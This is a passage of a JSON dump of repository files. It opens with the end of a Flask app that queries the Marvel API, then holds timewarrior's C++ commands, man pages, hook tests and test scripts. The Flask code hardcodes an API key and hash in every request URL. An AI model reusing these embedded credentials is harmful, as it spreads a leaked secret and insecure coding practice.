IN NO EVENT SHALL\n// THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n// SOFTWARE.\n//\n// https://www.opensource.org/licenses/mit-license.php\n//\n////////////////////////////////////////////////////////////////////////////////\n\n#include <Table.h>\n#include <Duration.h>\n#include <shared.h>\n#include <format.h>\n#include <commands.h>\n#include <timew.h>\n#include <iostream>\n\n// Implemented in CmdChart.cpp.\nstd::map <Datetime, std::string> createHolidayMap (Rules&, Interval&);\nstd::string renderHolidays (const std::map <Datetime, std::string>&);\n\n////////////////////////////////////////////////////////////////////////////////\nint CmdSummary (\n const CLI& cli,\n Rules& rules,\n Database& database)\n{\n const bool verbose = rules.getBoolean (\"verbose\");\n\n // Create a filter, and if empty, choose 'today'.\n auto filter = cli.getFilter (Range { Datetime (\"today\"), Datetime (\"tomorrow\") });\n\n // Load the data.\n auto tracked = getTracked (database, rules, filter);\n\n if (tracked.empty ())\n {\n if (verbose)\n {\n std::cout << \"No filtered data found\";\n\n if (filter.is_started ())\n {\n std::cout << \" in the range \" << filter.start.toISOLocalExtended ();\n if (filter.is_ended ())\n std::cout << \" - \" << filter.end.toISOLocalExtended ();\n }\n\n if (! filter.tags ().empty ())\n {\n std::cout << \" tagged with \" << joinQuotedIfNeeded (\", \", filter.tags ());\n }\n\n std::cout << \".\\n\";\n }\n\n return 0;\n }\n\n // Map tags to colors.\n auto palette = createPalette (rules);\n auto tag_colors = createTagColorMap (rules, palette, tracked);\n Color colorID (rules.getBoolean (\"color\") ? rules.get (\"theme.colors.ids\") : \"\");\n\n auto ids = findHint (cli, \":ids\");\n auto show_annotation = findHint (cli, \":annotations\");\n\n Table table;\n table.width (1024);\n table.colorHeader (Color (\"underline\"));\n table.add (\"Wk\");\n table.add (\"Date\");\n table.add (\"Day\");\n\n if (ids)\n {\n table.add (\"ID\");\n }\n\n table.add (\"Tags\");\n\n auto offset = 0;\n\n if (show_annotation)\n {\n table.add (\"Annotation\");\n offset = 1;\n }\n\n table.add (\"Start\", false);\n table.add (\"End\", false);\n table.add (\"Time\", false);\n table.add (\"Total\", false);\n\n // Each day is rendered separately.\n time_t grand_total = 0;\n Datetime previous;\n\n auto days_start = filter.is_started() ? filter.start : tracked.front ().start;\n auto days_end = filter.is_ended() ? 
filter.end : tracked.back ().end;\n\n if (days_end == 0)\n {\n days_end = Datetime ();\n }\n\n for (Datetime day = days_start.startOfDay (); day < days_end; ++day)\n {\n auto day_range = getFullDay (day);\n time_t daily_total = 0;\n\n int row = -1;\n for (auto& track : subset (day_range, tracked))\n {\n // Make sure the track only represents one day.\n if ((track.is_open () && day > Datetime ()))\n continue;\n\n row = table.addRow ();\n\n if (day != previous)\n {\n table.set (row, 0, format (\"W{1}\", day.week ()));\n table.set (row, 1, day.toString (\"Y-M-D\"));\n table.set (row, 2, day.dayNameShort (day.dayOfWeek ()));\n previous = day;\n }\n\n // Intersect track with day.\n auto today = day_range.intersect (track);\n if (track.is_open () && day <= Datetime () && today.end > Datetime ())\n today.end = Datetime ();\n\n std::string tags = join(\", \", track.tags());\n\n if (ids)\n {\n table.set (row, 3, format (\"@{1}\", track.id), colorID);\n }\n\n table.set (row, (ids ? 4 : 3), tags);\n\n if (show_annotation)\n {\n auto annotation = track.getAnnotation ();\n\n if (annotation.length () > 15)\n annotation = annotation.substr (0, 12) + \"...\";\n\n table.set (row, (ids ? 5 : 4), annotation);\n }\n\n table.set (row, (ids ? 5 : 4) + offset, today.start.toString (\"h:N:S\"));\n table.set (row, (ids ? 6 : 5) + offset, (track.is_open () ? \"-\" : today.end.toString (\"h:N:S\")));\n table.set (row, (ids ? 7 : 6) + offset, Duration (today.total ()).formatHours ());\n\n daily_total += today.total ();\n }\n\n if (row != -1)\n table.set (row, (ids ? 8 : 7) + offset, Duration (daily_total).formatHours ());\n\n grand_total += daily_total;\n }\n\n // Add the total.\n table.set (table.addRow (), (ids ? 8 : 7) + offset, \" \", Color (\"underline\"));\n table.set (table.addRow (), (ids ? 8 : 7) + offset, Duration (grand_total).formatHours ());\n\n const auto with_holidays = rules.getBoolean (\"reports.summary.holidays\");\n\n std::cout << '\\n'\n << table.render ()\n << (with_holidays ? 
renderHolidays (createHolidayMap (rules, filter)) : \"\")\n << '\\n';\n\n return 0;\n}\n\n////////////////////////////////////////////////////////////////////////////////\nstd::string renderHolidays (const std::map<Datetime, std::string> &holidays)\n{\n std::stringstream out;\n\n for (auto &entry : holidays)\n {\n out << entry.first.toString (\"Y-M-D\")\n << \" \"\n << entry.second\n << '\\n';\n }\n\n return out.str ();\n}\n\n////////////////////////////////////////////////////////////////////////////////\n" }, { "alpha_fraction": 0.79756098985672, "alphanum_fraction": 0.79756098985672, "avg_line_length": 44.66666793823242, "blob_id": "8844f7a8b86b2a9eb3c5ae8811c4122c670a625e", "content_id": "795699b730ad24d5ffd3bdff09f7428de45d7881", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 410, "license_type": "permissive", "max_line_length": 190, "num_lines": 9, "path": "/completion/README.md", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "# Shell completion\n\nThe script here is taken from a separate project.\nIssues and pull-requests should go there.\nThe updated version will then be included here.\n\nIf you are missing a completion, feel free to contribute.\n\n* `timew-completion.bash` is taken from https://github.com/lauft/timew-bashcompletion which is released under [MIT license](https://github.com/lauft/timew-bashcompletion/blob/master/LICENSE)" }, { "alpha_fraction": 0.7632086277008057, "alphanum_fraction": 0.7705360651016235, "avg_line_length": 34.0405387878418, "blob_id": "cf719d8a654f17cda6c26fc5bde32d004b612f47", "content_id": "29cfc468d26f06fc12fe89f45427d97efb6137f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2593, "license_type": "permissive", "max_line_length": 184, "num_lines": 74, "path": "/README.md", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "# Timewarrior\n\n[![tests](https://github.com/GothenburgBitFactory/timewarrior/actions/workflows/tests.yaml/badge.svg)](https://github.com/GothenburgBitFactory/timewarrior/actions/workflows/tests.yaml)\n\nThank you for taking a look at Timewarrior!\n\nTimewarrior is a time tracking utility that offers simple stopwatch features as well as sophisticated calendar-based backfill, along with flexible reporting.\nIt is a portable, well supported and very active Open Source project.\n\n## Installing\n\n### From Package\n\nThanks to the community, there are binary packages available [here](https://timewarrior.net/docs/install.html#distributions).\n\n### Building Timewarrior\n\nBuilding Timewarrior yourself requires\n\n* git\n* cmake\n* make\n* C++ compiler with full C++14 support, currently gcc 6.1+ or clang 3.4+ \n* Python 3 (for running the testsuite)\n* Asciidoctor (for creating documentation)\n\nThere are two ways to retrieve the Timewarrior sources:\n\n* Clone the repository from Github,\n\n git clone --recurse-submodules https://github.com/GothenburgBitFactory/timewarrior\n cd timewarrior\n\n* Or download the tarball with curl,\n\n curl -O https://github.com/GothenburgBitFactory/timewarrior/releases/download/v1.4.3/timew-1.4.3.tar.gz\n\n and expand the tarball\n\n tar xzf timew-1.4.3.tar.gz\n cd timew-1.4.3\n\nBuild Timewarrior, optionally run the test suite, and install it.\n\n cmake -DCMAKE_BUILD_TYPE=release\n make\n [make test]\n sudo make install\n\nThis copies files into the right place (default under `/usr/local`), and installs man 
pages.\n\nAdd the optional parameter `-DCMAKE_INSTALL_PREFIX=/path/to/your/install/location` to the `cmake` command if you want to install Timewarrior at a location other than `/usr/local`.\nThe `make install` command may not require `sudo` depending on your choice of install location.\n\n## Documentation\n\nThere is extensive online documentation.\nYou'll find all the details at [timewarrior.net/docs/](https://timewarrior.net/docs/).\n\nThere you will find the documentation, downloads, news and more.\n\n## Contributing\n\nYour contributions are especially welcome.\nWhether it comes in the form of code patches, ideas, discussion, bug reports, encouragement or criticism, your input is needed.\n\nFor support options, take a look at [CONTRIBUTING.md](CONTRIBUTING.md) or visit [taskwarrior.org](https://taskwarrior.org/support).\n\nVisit [Github](https://github.com/GothenburgBitFactory/timewarrior) and participate in the future of Timewarrior.\n\n## License\n\nTimewarrior is released under the MIT license.\nFor details check the [LICENSE](LICENSE) file.\n" }, { "alpha_fraction": 0.6404109597206116, "alphanum_fraction": 0.6780821681022644, "avg_line_length": 16.176469802856445, "blob_id": "5280cb4192cfb10771969e66c3540e37911f6d96", "content_id": "fe38ec3a8122406f3646429ea6789c118e48e41b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 292, "license_type": "permissive", "max_line_length": 48, "num_lines": 17, "path": "/doc/man1/timew-export.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-export(1)\n\n== NAME\ntimew-export - export tracked time in JSON\n\n== SYNOPSIS\n[verse]\n*timew export* [_<range>_] [_<tag>_**...**]\n\n== DESCRIPTION\nExports all the tracked time in JSON format.\nSupports filtering.\n\n== EXAMPLES\nFor example:\n\n $ timew export from 2016-01-01 for 3wks tag1\n" }, { "alpha_fraction": 0.7170542478561401, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 20.5, "blob_id": "19baf84877bf74c952b54ddaa41dc1cd14e09ee9", "content_id": "7c1aade381c26b57aa2dd765c92a2af701b14d41", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 258, "license_type": "permissive", "max_line_length": 80, "num_lines": 12, "path": "/doc/man1/timew-tags.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-tags(1)\n\n== NAME\ntimew-tags - display a list of tags\n\n== SYNOPSIS\n[verse]\n*timew tags* [_<range>_]\n\n== DESCRIPTION\nDisplays all the tags that have been used by default.\nWhen a filter is specified, shows only the tags that were used during that time.\n" } ]
13
Adrien-Itescia/starwars_itescia
https://github.com/Adrien-Itescia/starwars_itescia
a779ab5936226f7abf7eb44d8c76c98ff00cab54
9dd5c7e426cb56c635f3a1ede10480226e72a668
9077f49cba93a4ebbd5ead62570308da2944c59c
refs/heads/master
2020-09-21T17:46:24.885693
2019-11-29T14:41:14
2019-11-29T14:41:14
224,871,347
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6874462366104126, "alphanum_fraction": 0.7059329152107239, "avg_line_length": 33.75384521484375, "blob_id": "fce03e2fbd67dc54e42d5b22e9b299de74bb01cf", "content_id": "3022430c88f11fff599538606c6aaf90b9fc73bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2341, "license_type": "no_license", "max_line_length": 140, "num_lines": 65, "path": "/SWProject/MonProgramme.py", "repo_name": "Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "from Acteurs import *\r\nfrom Film import *\r\nfrom Personnage import *\r\n\r\n\r\n# Création liste pour question 4\r\nmacollection = ['objet1','objet2','objet3']\r\nprint(macollection)\r\n\r\nfilm1 = film()\r\nacteurs1 = acteurs()\r\nprint(film1.titre,\"\\n\",\"Sortie en\",film1.anneesortie,\"\\n\",\"Episode n°\",film1.numeroepisode,\"\\n\",\r\n \"Son cout:\",film1.cout,\"\\n\",\"Sa recette:\",film1.recette,\"\\n\",\"L'acteur principal\",acteurs1.prenom,acteurs1.nom)\r\n\r\nprint(\"\\n\",\"Saisir les informations pour le deuxieme film\")\r\nfilm1.titre = input(\"Saisir le titre: \")\r\nfilm1.anneesortie = input(\"Saisir l'annee sortie \")\r\nfilm1.numeroepisode = input(\"Saisir le numéro episode \")\r\nfilm1.cout = input(\"Saisir Cout \")\r\nfilm1.recette = input(\"Saisir recette \")\r\nacteurs1.nom = input(\"Saisir le nom de l'acteur \")\r\nacteurs1.prenom = input(\"Saisir le prenom de l'acteur \")\r\n\r\nfilm2=film()\r\nacteurs2=acteurs\r\nprint(\"\\n\",\"Les informations sur le deuxième film:\",\"\\n\",film1.titre,\"\\n\",\"Sortie en\",film1.anneesortie,\"\\n\",\"Episode n°\",\r\n film1.numeroepisode,\"\\n\",\"Son cout\",film1.cout,\"\\n\",\"Sa recette\",film1.recette,\"\\n\",\"L'acteur principal\",acteurs1.prenom,acteurs1.nom)\r\n\r\n# Crée le premier personnage\r\npersonnage1=personnage()\r\nprint(\"\\n\", \"Création personnage\")\r\npersonnage1.nom = input(\"Saisir son nom \")\r\npersonnage1.prenom = input(\"Saisir prenom \")\r\nprint(\"Le personnage est:\",personnage1.prenom,personnage1.nom)\r\n\r\n\r\nliste = []\r\nn = int(input(\"Saisir le nombre de personnages incarnés par un seul acteur : \"))\r\nprint(\"Saisir le nom et prénom sur chaque ligne\")\r\n\r\n# Boucle qui permet d'attribuer plusieurs personnages à un seul acteur\r\nfor i in range(0, n):\r\n element = str(input())\r\n liste.append(element) # Ajoute l'élément\r\n\r\n# Assigne les noms et au prénoms au duet\r\nacteurs.duet = liste\r\n# Affiche la valeur retournée par le duet\r\nfor i in range(0, n):\r\n print(acteurs.duet[i])\r\n\r\n\r\n\r\nacteur3=acteurs\r\n# Retourne le nombre de personnage joué par un acteur\r\nacteurs.nbPersonnages = n\r\nacteurs.nom = input(\"Saisir le nom de l'acteur \")\r\nprint(\"L'acteur\", acteurs.nom,\"joue\",acteurs.nbPersonnages, \"personnages\")\r\n\r\nprint(\"\\n\",\"Le nombre d'acteurs est\",film2.nbActeurs)\r\nprint(\"Le nombre de personnages est\", film2.nbPersonnages)\r\nprint(film2.get_calculBenefice())\r\nprint(film2.get_isBefore())\r\nprint(film2.get_tri())\r\nfilm2.get_makeBackup()\r\n\r\n" }, { "alpha_fraction": 0.543175458908081, "alphanum_fraction": 0.543175458908081, "avg_line_length": 20.4375, "blob_id": "9a908c058c316dd038f4443fe6a4ad2772728e0b", "content_id": "157bfba17aec4a24e1b67b58e37faf07bc147443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 54, "num_lines": 16, "path": "/SWProject/Personnage.py", "repo_name": 
"Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "class personnage:\r\n def __init__(self, nom=\"ObiWan\", prenom=\"Kenobi\"):\r\n self.nom = nom\r\n self.prenom = prenom\r\n\r\n def get_nom(self):\r\n return self.nom\r\n\r\n def get_prenom(self):\r\n return self.prenom\r\n\r\n def set_nom(self, nom):\r\n self.nom = nom\r\n\r\n def set_prenom(self, prenom):\r\n self.prenom = prenom\r\n" }, { "alpha_fraction": 0.5794270634651184, "alphanum_fraction": 0.5846354365348816, "avg_line_length": 22.838708877563477, "blob_id": "8a90b3acc374ced49849a32ab40e6aab247137c6", "content_id": "538855101250e38d961521b813dfdc0fa6562505", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 768, "license_type": "no_license", "max_line_length": 106, "num_lines": 31, "path": "/SWProject/Acteurs.py", "repo_name": "Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "# Question 1\r\nclass acteurs:\r\n def __init__(self, nom=\"Wick\", prenom=\"John\", duet=[\"personnage1\", \"personnage2\"], nbPersonnages = 0):\r\n self.nom = nom\r\n self.prenom = prenom\r\n self.duet = duet\r\n self.nbPersonnages = nbPersonnages\r\n\r\n def get_nom(self):\r\n return self.nom\r\n\r\n def get_prenom(self):\r\n return self.prenom\r\n\r\n def get_duet(self):\r\n return self.duet\r\n\r\n def get_nbPersonnages(self):\r\n return self.nbPersonnages\r\n\r\n def set_nom(self, nom):\r\n self.nom = nom\r\n\r\n def set_prenom(self, prenom):\r\n self.prenom = prenom\r\n\r\n def set_duet(self, duet):\r\n self.duet = duet\r\n\r\n def set_nbPersonnages(self, nbPersonnages):\r\n self.nbPersonnages = nbPersonnages" }, { "alpha_fraction": 0.5987308621406555, "alphanum_fraction": 0.6076894402503967, "avg_line_length": 25.639175415039062, "blob_id": "6397b9eb99dedd38e1216040681ad8ffced73bbe", "content_id": "ea539d215ec29a4ba2cfdd2c708b76f4ddfa205b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2682, "license_type": "no_license", "max_line_length": 151, "num_lines": 97, "path": "/SWProject/Film.py", "repo_name": "Adrien-Itescia/starwars_itescia", "src_encoding": "UTF-8", "text": "class film:\r\n def __init__(self, titre=\"La revanche de R2D2\", anneesortie=2000, numeroepisode=5, cout=1000, recette=5000, collection=['R2D2', 'Vador', 'Obiwan'],\r\n nbActeurs=3, nbPersonnages=7):\r\n self.titre = titre\r\n self.anneesortie = anneesortie\r\n self.numeroepisode = numeroepisode\r\n self.cout = cout\r\n self.recette = recette\r\n self.collection = collection\r\n self.nbActeurs = nbActeurs\r\n self.nbPersonnages = nbPersonnages\r\n\r\n# Retourne la valeur de la fonction appellée\r\n def get_titre(self):\r\n return self.titre\r\n\r\n def get_anneesortie(self):\r\n return self.anneesortie\r\n\r\n def get_numeroepisode(self):\r\n return self.numeroepisode\r\n\r\n def get_cout(self):\r\n return self.cout\r\n\r\n def get_recette(self):\r\n return self.recette\r\n\r\n def get_collection(self):\r\n return self.collection\r\n\r\n def get_nbActeurs(self):\r\n return self.nbActeurs\r\n\r\n def get_nbPersonnages(self):\r\n return self.nbPersonnages\r\n\r\n def get_calculBenefice(self):\r\n valeur = self.recette - self.cout\r\n if self.recette > self.cout:\r\n print(\"Le film rapporte un benefice de\", valeur)\r\n else:\r\n print(\"Le perd un montant de\", valeur)\r\n return valeur\r\n\r\n def get_isBefore(self):\r\n if self.anneesortie > 2000:\r\n val = False\r\n else: val = True\r\n return val\r\n\r\n def get_tri(self):\r\n 
return sorted(self.collection)\r\n\r\n def get_makeBackup(self):\r\n dictionnaire = {\r\n 1: self.anneesortie\r\n }\r\n print(dictionnaire)\r\n return dictionnaire\r\n\r\n# Définie une valeur pour la fonction appellée\r\n def set_titre(self, titre):\r\n self.titre = titre\r\n\r\n def set_anneesortie(self, anneesortie):\r\n self.anneesortie = anneesortie\r\n\r\n def set_numeroepisode(self, numeroepisode):\r\n self.numeroepisode = numeroepisode\r\n\r\n def set_cout(self, cout):\r\n self.cout = cout\r\n\r\n def set_recette(self, recette):\r\n self.recette = recette\r\n\r\n def set_collection(self, collection):\r\n self.collection = collection\r\n\r\n def set_nbActeurs(self, nbActeurs):\r\n self.nbActeurs = nbActeurs\r\n\r\n def set_nbPersonnages(self, nbPersonnages):\r\n self.nbPersonnages = nbPersonnages\r\n\r\n def set_calculBenefice(self, calculBenefice):\r\n self.calculBenefice = calculBenefice\r\n\r\n def set_isBefore(self, isBefore):\r\n self.isBefore = isBefore\r\n\r\n def set_tri(self, tri):\r\n self.tri = tri\r\n\r\n def set_makeBackup(self, makeBackup):\r\n self.makeBackup = makeBackup" } ]
4
vmueller12/Launch-Project-in-Django
https://github.com/vmueller12/Launch-Project-in-Django
3ee9f198f76787d432fcb234eb5f5971fcbf2339
ab6f98277005629ec703fa0b99a7a0e8e4d15be4
e3a617da9570a5399088f16428e2468d5dc89d3e
refs/heads/master
2016-08-08T22:43:07.125309
2015-10-29T11:37:19
2015-10-29T11:37:19
44,969,215
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5249999761581421, "alphanum_fraction": 0.5416666865348816, "avg_line_length": 29.006755828857422, "blob_id": "609044b958b8998c58fb5e0fdb5bd47bf683bfed", "content_id": "055f16bd1c9f714da99738410c31f3b95f11dc0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 4440, "license_type": "no_license", "max_line_length": 129, "num_lines": 148, "path": "/launch/templates/home.html", "repo_name": "vmueller12/Launch-Project-in-Django", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n{% load staticfiles %}\n\n{% block styles %}\n\n\n body {\n border-top: 4px solid #1e4e70;\n /*min-height: 5000px;*/\n /*min-width: 5000px;*/\n background: url('{% static \"img/sea2.jpg\" %}') no-repeat center center fixed;\n -webkit-background-size: cover;\n -moz-background-size: cover;\n -o-background-size: conver;\n background-size: cover;\n /*background-image: url('{% static \"img/beach.jpg\" %}');*/\n /*background-image:url('https://lh4.googleusercontent.com/-FsgMNhfQLSg/AAAAAAAAAAI/AAAAAAAAaRY/3VnF3vSuWKk/photo.jpg');*/\n /*background-repeat: repeat-x;*/\n }\n \n .jumbotron h1 {\n \n font-weight: 100 !important;\n \n \n }\n \n \n\n\n{% endblock %}\n\n{% block content %}\n\n <!-- Main component for a primary marketing message or call to action -->\n <div class=\"jumbotron\" style=\"background-color: white\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-sm-6\">\n <h1>Backpackers Home</h1>\n <br/><br/>\n <p>Connect with Backpackers Around the Globe and Make your experience memorable...</p>\n <p>Meet new people and travel together to explore different places...</p>\n <p>Come and Join us to be part of the most exciting journey of your live!</p>\n <p><a class=\"btn btn-default btn-lg btn-block\" href='#signup' role=\"button\">Be First &raquo;</a></p>\n </div>\n <div class='col-sm-6'>\n <img src=\"{% static 'img/theglobepack.png' %}\" class='img-responsive' />\n </div>\n </div>\n <hr/>\n </div><!-- /container -->\n\n </div> \n\n\n<div class=\"container text-center\" style=\"color:#FFFFFF;\" id=\"signup\">\n <div class='col-sm-6 col-sm-offset-3'>\n <i class=\"fa fa-key fa-5x\"></i>\n <h1>Unlock First</h1>\n \n <form class='form-horizontal' method=\"POST\" action=\"\"> {% csrf_token %}\n <div class='form-group form-group-lg'>\n \n \n <div class=\"input-group\">\n <input class='form-control' type=\"email\" name=\"email\" placeholder=\"Your email...\" />\n <span class='input-group-btn'>\n <input type='submit' value='Join' class='btn btn-primary btn-lg' />\n </span>\n </div>\n {% if form.email.errors %}\n {% for err in form.email.errors %}\n <!--<div class=\"alert alert-danger\" role=\"alert\">{{ err }}</div>-->\n <p style=\"margin-top: 8px; color: red;\"><b>Your Email is required</b></p>\n {% endfor %}\n {% endif %}\n </div>\n </form>\n <p class='lead'>Sign up here. 
<br/> Get First News on Content</p>\n </div>\n\n</div>\n\n<div class=\"container-fluid\">\n<div class='row' style='text-align:center;background-color:white;margin-top: 80px;padding-bottom: 20px;min-height:200px;'>\n <div class='col-sm-12'>\n <br/>\n <h1>Services You Get!</h1>\n <br/>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-comment fa-3x\"></i>\n <h2>Chat Service</h2>\n <p class='lead'>\n Communicate with your Backpacker Mates.\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-users fa-3x\"></i>\n <h2>Match Selection</h2>\n <p class='lead'>\n Select a BP Mate, which has similar intrests.\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-share-alt fa-3x\"></i>\n <h2>Share your Images and Videos</h2>\n <p class='lead'>\n Share your experience with new Backpackers.\n Get Rewards for the best retad Video or Image.\n </p>\n </div>\n <!-- \n</div>\n<div class='row' style='text-align:center;background-color:white;margin-bottom:0px; padding-bottom: 40px; min-height:200px;'>\n <div class='col-sm-12'>\n <hr/>\n <br/>\n <br/><br/>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-comment fa-3x\"></i>\n <h2>Accomandation</h2>\n <p class='lead'>\n Find a place to stay.\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-users fa-3x\"></i>\n <h2>Jobs</h2>\n <p class='lead'>\n Find a Backpacker Job\n </p>\n </div>\n <div class='col-sm-4'>\n <i class=\"fa fa-share-alt fa-3x\"></i>\n <h2>Book Your Adventure Trip with Us!</h2>\n <p class='lead'>\n Get discounted travel tickets and much more...\n </p>\n </div>\n\n</div>\n -->\n</div>\n\n{% endblock %}" }, { "alpha_fraction": 0.5131579041481018, "alphanum_fraction": 0.5131579041481018, "avg_line_length": 25.25, "blob_id": "1ce1fb31e452e4e97ae7b6a998643ca479aae9b6", "content_id": "519a600d3b37dbc0cf1651e1e9546f624d5b5725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 52, "num_lines": 20, "path": "/launch/launch/middleware.py", "repo_name": "vmueller12/Launch-Project-in-Django", "src_encoding": "UTF-8", "text": "from welcome.models import Join\n\n\nclass ReferMiddleware():\n \n def process_request(self, request):\n ref_id = request.GET.get(\"ref\", \"\")\n print \"HHHHHHHHHHHHHHHHHHHH\"\n try:\n obj = Join.objects.get(ref_id=ref_id)\n # It it does exsist\n print obj\n except:\n # Object does not exsist in the Database\n # with the ref_id number\n obj = None\n \n if obj:\n request.session['ref'] = obj.id\n print obj.id\n " }, { "alpha_fraction": 0.5674542784690857, "alphanum_fraction": 0.5724085569381714, "avg_line_length": 27.813186645507812, "blob_id": "45f77d9c3c5937ff1eebea42295ee5f369bdfb09", "content_id": "0ea846a313344e5bad7265926ef76b4cd5e69d68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2624, "license_type": "no_license", "max_line_length": 78, "num_lines": 91, "path": "/launch/welcome/views.py", "repo_name": "vmueller12/Launch-Project-in-Django", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.shortcuts import render, redirect, Http404\nfrom .forms import EmailForm, JoinForm\nfrom .models import Join\n\nimport uuid\n\ndef get_ref_id():\n # We check if we have an unique reference ID\n ref_id = str(uuid.uuid4())[:11].replace('-', '').lower()\n try:\n id_exists = Join.objects.get(ref_id=ref_id) \n get_ref_id()\n except:\n # Does not exist\n return ref_id\n\n\ndef get_ip(request):\n \"\"\"get_ip function to 
grab the Id address from the client\"\"\"\n try:\n x_forward = request.META.get(\"HTTP_X_FORWARDED_FOR\")\n if x_forward != None:\n ip = x_forward.split(\",\")[0]\n else:\n ip = request.META.get(\"REMOTE_ADDR\") \n except:\n ip = ''\n return ip\n\n\ndef share(request, ref_id):\n try:\n join_obj = Join.objects.get(ref_id=ref_id)\n friends_referred = Join.objects.filter(friend=join_obj)\n count = join_obj.referral.all().count()\n ref_url = settings.SHARE_URL + str(join_obj.ref_id)\n context = {\"ref_id\":join_obj.ref_id,\"count\": count,\"ref_url\": ref_url}\n template = \"share.html\"\n return render(request,template,context)\n # except Join.DoesNotExsist:\n # raise Http404\n except:\n raise Http404\n\n\n# Create your views here.\ndef home(request):\n try:\n join_id = request.session['ref']\n obj = Join.objects.get(id=join_id)\n except:\n join_id = None\n \n # print \"the id is \" + str(join_id) + \" \" + str(obj.email)\n\n form = JoinForm(request.POST or None)\n if form.is_valid():\n new_join = form.save(commit=False)\n # We might do here some stuff before we save the\n # Form to the Database / Model\n email = form.cleaned_data['email']\n new_join_old, created = Join.objects.get_or_create(email=email)\n if created:\n new_join_old.ref_id = get_ref_id()\n \n if not obj == None:\n new_join_old.friend = obj\n new_join_old.ip_address = get_ip(request)\n new_join_old.save()\n \n # print all friends that joined as a result of sharer email\n #print Join.objects.filter(friend=obj)\n ##print obj.referral.all().count()\n \n #redirect here\n return redirect(\"/\"+str(new_join_old.ref_id))\n \n #new_join.ip_address = get_ip(request)\n #new_join.save() \n # end\n \n context = {\n 'form': form,\n \n }\n return render(request, \"home.html\", context)\n\n\ndef testhome(request):\n return render(request, \"donotuse.html\", {})\n\n\n" } ]
3
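The welcome/models.py module that views.py and middleware.py import above is not part of this record, so here is a hedged, minimal sketch of what the Join model likely looks like, inferred purely from how it is used (email, ref_id, a self-referencing friend relation exposed via the `referral` reverse name, and ip_address). Every field option shown is an assumption, not the author's code.

```python
# Hypothetical reconstruction of welcome/models.py (not shipped in this entry).
# Field names come from views.py/middleware.py usage; all options (max_length,
# null/blank, the old-style ForeignKey signature) are assumptions for an
# early-Django, Python 2 codebase like this one.
from django.db import models


class Join(models.Model):
    email = models.EmailField()
    # get_ref_id() in views.py produces an 11-character slug, so unique=True fits
    ref_id = models.CharField(max_length=32, unique=True)
    # share() and the middleware traverse obj.referral.all(), hence the related_name
    friend = models.ForeignKey('self', related_name='referral',
                               null=True, blank=True)
    ip_address = models.CharField(max_length=64, blank=True)

    def __unicode__(self):
        return self.email
```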
ondolist/CheckOfficeSafety
https://github.com/ondolist/CheckOfficeSafety
da624b98c2c1f258741d3bdded80b51067b2ebac
523eb2d16e02b1c60c630ad3fda5fe22f0236da8
fabf0cb8d98e33256bcc167707150e1040103d53
refs/heads/main
2023-08-25T01:11:45.484289
2021-11-07T06:55:57
2021-11-07T06:55:57
365,227,998
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4716311991214752, "alphanum_fraction": 0.481947124004364, "avg_line_length": 26.210525512695312, "blob_id": "49a5e0a582f03094e96c5760d6f0afa21e539dc8", "content_id": "6a7fa329e391495e4df69f0dafa8612ff5e04428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3112, "license_type": "no_license", "max_line_length": 212, "num_lines": 114, "path": "/url_extractor.py", "repo_name": "ondolist/CheckOfficeSafety", "src_encoding": "UTF-8", "text": "import zipfile\nimport re \nimport os\nimport random\nimport string\nimport shutil\nimport sys\n#from urlextract import URLExtract\n\nprint(\"-----------------------------------------------------------------------------------\")\nprint(\"File name: \"+sys.argv[1])\nprint(\"-----------------------------------------------------------------------------------\")\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\n\ncommon_domains=[\"schemas.openxmlformats.org\", \"www.w3.org\", \"schemas.microsoft.com\"]\nsuspicious_keywords=['ole']\n\n\nletters = string.ascii_lowercase\nrandom_string=''.join(random.choice(letters) for i in range(10))\n \nfantasy_zip = zipfile.ZipFile(sys.argv[1])\nfantasy_zip.extractall('extract_temp\\\\'+random_string+\"\\\\\")\nfantasy_zip.close()\n\n\npath = 'extract_temp\\\\'+random_string+\"\\\\\"\n\n\nfiles = []\n# r=root, d=directories, f = files\nfor 